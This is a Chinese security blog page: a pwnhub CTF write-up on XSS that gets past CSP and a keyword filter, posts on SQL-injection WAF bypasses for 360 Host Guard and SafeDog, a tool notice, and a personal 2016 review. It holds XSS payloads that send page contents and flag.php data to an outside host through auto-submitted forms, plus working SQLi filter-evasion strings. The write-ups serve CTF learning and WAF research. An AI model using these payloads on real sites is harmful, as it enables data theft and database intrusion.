分类 笔记 下的文章

pwnhub -- 绝对防御 writeup


周末做了一道对于我来说很蛋疼的题目...但是看了各位师傅的writeup就觉得自己的思路太窄了....

题目地址:https://pwnhub.cn/gamedetail?id=13

注册之后有个留言板,有CSP(不允许对外发送请求),经过测试只过滤一次某些单次,如:on,oonn就能过。

用表单来绕过csp返回页面到我的服务器上,看到提示

poc:

<imong src=x oonnerror="var htmlstr = document.getElementsByTagName('html')[0].innerHTML;$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/hub1'+ escape(htmlstr)+' method=GET id=show></form><scronipt>document.getElementById(\\'show\\').submit()</scronipt>')">

转码后发现提示( http://zone.secevery.com/code/index.html 在线编码转码...之前写的辣鸡程序...):

1111111.jpg

访问http://52.80.63.91/adminshigesha233e3333/ 提示flag.php

2222222.jpg

访问flag.php 提示只有admin能看....

3333.jpg

尝试盲打admin返回flag.php的内容.
poc:

<imong src=x oonnerror="$.get('/adminshigesha233e3333/flag.php', functioonn(data){$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/'+ escape(data)+' method=GET id=show></form><scronipt>document.getElementById(\\'show\\').submit()</scronipt>')})">

555555.jpg

提示:nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...

http://52.80.63.91/adminshigesha233e3333/

PS:在这里卡了一天多,在各种尝试加header访问,get访问,post访问,各种蛋疼,测到半夜的时候题目后端挂了...
继续回到我们开始拿到的提示url:http://52.80.63.91/adminshigesha233e3333/#admin

查看源码:

6666.jpg

发现可以xss,并且页面有设置csp规则:Content-Security-Policy:default-src 'self'; script-src 'nonce-9VyGxnyKcfU4';
再看看提示说在"adminshigesha233e3333" 才可以读取到内容,我又在这里卡了很久,我以为这里是个文件读取漏洞...后来忽然想起这里有个反射xss,又有csp。于是把思路放到用xss来读取flag.php上。

poc:

<iframe name=aa src="./adminshigesha233e3333/#admin%3Ciframe id=hh%20src%3D./flag.php name=bb></iframe>" oonnload="var str = window.frames.aa.frameElement.coonntentDocument.defaultView.bb.document.getElementsByTagName('html')[0].innerHTML;$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/hub'+ escape(str)+' method=GET id=show></form><scronipt>document.getElementById(\\'show\\').submit()</scronipt>')"></iframe>

777.jpg

成功拿到flag...感谢佳佳前端大佬的帮助...卡在两层iframe好久...后来去问了下前端大佬,她说可以在父iframe读取子iframe的内容。

888.jpg

//firefox 下获取iframe内容
document.getElementById('flag').contentWindow.document.getElementsByTagName('html')[0].innerHTML;

//firefox 下等待页面加载完毕再获取iframe里面的内容
window.onload=function(){var str = document.getElementById('flag').contentWindow.document.getElementsByTagName('html')[0].innerHTML;}

//获取iframe 二层内容
window.frames.aa.frameElement.contentDocument.defaultView.bb.document.getElementsByTagName('html')[0].innerHTML

最后的最后再次感谢下佳佳前端大佬还有出题的师傅,真的被虐哭了。


利用IIS特性简单 Bypass 360主机卫士SQL注入拦截


环境:asp+access+iis
周末有个不知名的小伙伴叫我帮忙绕下waf,看了下有点意思。

先简单看看拦截什么
union select 1,2 拦截
union%0aselect 1,2 拦截
union%0as%u0065lect 1,2 拦截
参数污染 id=86 union&id=s%u0065lect 1,2 也拦截

2222.jpg

iis一个特性碰到单一的百分号(%)会忽略掉。
也就是说s%elect == select
但是经过fuzz如下:
union s%elect 1,2 还是拦截

333.jpg

union 1,2 不拦截

444.jpg

也就是说我们需要绕过select
尝试每个字母后面加上百分号

union s%e%l%e%c%t 1,2 拦截

我扶了扶我不存在的眼镜框,然后继续fuzz。
编故事编的我自己都有点累的,经过反复fuzz,发现在中间打断即可。
union sel%ect 1,2 不拦截,想知道为什么吗?我特么知道我就不用在fuzz了。

555555.jpg

代码层有个很变态的过滤,过滤了很多东西,这个站并不是我的目标,我的目标就bypass waf,因为种种原因就不射出管理员密码了。

66666.jpg

注:这文章写了好久了,不知道是否还能bypass,废话很多,也感谢你们看到这里,主要说个过程。


Mysql下Union注入Bypass安全狗过程


一次众测发现个注入,然后有安全狗就顺带看了下安全狗。

111.jpg

先fuzz看看安全狗拦截什么关键词
union select x,x 拦截

222.jpg

尝试用union函数 union(select 1,2,3) 拦截
union(%20select 1,2,3,4) 不拦截,注意select前面有个空格
之前出题的代码...懒得改了…中二。

333.jpg

union(%20select%201,(select%20user%20from%20mysql.user),3,4) p神说没有from就不算绕过,尝试用from注入被拦截。

444.jpg

union(%20select%201,(select%20user%20from(mysql.user)),3,4) 尝试把from换成函数,被拦截了。
想起来之前绕union函数前面带的空格,这里也尝试了下
union(%20select%201,(select%20user%20from(%20mysql.user)%20limit%202,1),3,4) 注意from函数里面第一位就是空格

555.jpg

实际上还有很多过狗的方法,我第一次跟P神交流的时候不是这个payload,那个payload还要长很多,但是P神说了重要的是过程,我再研究了下,发现这个payload比较短点,最后希望跟各位大师傅一起学习,最后的最后感谢下phithon师傅


SecIcode在线编码工具 V1


SecIcode在线编码工具(内测版) V1 -- 赛克艾威

SecIcode能干嘛,编码:十进制、十六进制、hex、url、base64等...

http://zone.secevery.com/code/index.html 在线体验,需要什么功能或者有兴趣维护再或者有什么bug的随时私聊我。

222222222222.png


2016


要是有些事我没说,你别以为是忘了,我什么也没忘,但是有些事只适合收藏。不能说,也不能想,却又不能忘。 --史铁生

1.生活相关.

他走了,可以说是对我前十几年影响最大的人。

拾起了以前追的火影忍者,看着看着就觉得有些人有些事跟自己身边挺像的,遗憾的是东京食尸鬼今年并没有出第三季。

几乎把英雄联盟戒了,玩起了守望先锋,然而还是菜鸡。开黑吗,我的76贼6。

和她分手了,一个人的生活习惯了,也不想两个人了。

上海->北京->广西来回跑,累。

最后养了一只猫,它叫断断。

得到了她失去了她,得到了他失去了他,得到了它失去了它。

2.工作相关.

15年我还是个在厨房打杂的员工,16年果断放弃了那种安逸的生活,一个人一个背包来到了北京,在王松家借住了几天,本来想去新浪的,后来新浪的人说他们招的是安全架构。在小川的帮助下投了两家公司,新浪乐居,乌云。新浪乐居因为学历问题没过,倒是去了乌云,真的非常感谢小川,不是他也不会认识那么多优秀的人。

去了乌云Tangscan做个打杂的安全狗,认识了一群很厉害的朋友,对我的安全路影响很大,Redfree、贝贝、大川、saline、booooom等等,真的非常感谢对我的帮助。我怀念的是跟小胜子一起去redfree家蹭饭,我怀念的是跟小胜子和栋栋和LN去网吧开黑。

后面因为一些事我们散了。

现在朋友创业,赛克艾威,在他的公司混吃混喝,其实做了挺多事的,从前端到php再到python,说不累是不可能的,人总要去弄一些自己不会的东西才能成长得更快,希望能一直混吃混喝下去。

3.学习相关.

16年算是学会了点python,再度拾起thinkphp、javascript,并写了一个网站。

也学会了更多挖洞姿势。

16年4月份左右买了台mac,对linux可以说熟悉了点。

我觉得最重要的是学会了怎么跟客户沟通,在Tangscan的时候经常跟客户沟通以及偶尔去客户公司驻场的问题,再到后来的赛克艾威,跟客户沟通简直就是一门艺术。

再就是感谢北斗Team的小伙伴,让我学会怎么跟人沟通,毕竟以前宅,什么也不会。

4.安全相关.

出过两次题目,感觉出题还挺有意思的,就是自己的技术太辣鸡,出不了什么吊炸天的题目。

本兮去世了,我不禁想起我当时学习安全的动力,一个是因为当时的DNF号被盗了,我特么的100万金币被人洗了,从这里认识红盟,再到后面的动力是因为我想知道一些别人不知道的秘密,所以义无反顾的搞起了安全,本兮去世的网上都是没有什么理由,想去调查,却发现自己无能为力,终有一天我有能力去偷窥一些秘密!先给自己立个Flag。

总结:

我觉得过去一年自己变化最大就是变低调多了。

得到很多,失去很多。

2017的目标:

学习Python,学习安全,学习做人。

然后继续像一个咸鱼一样活着。

对自己而言最重要的东西未必就是正义的。就算知道了那是邪恶的人也不能战胜孤独。 --我爱罗

33333333.jpg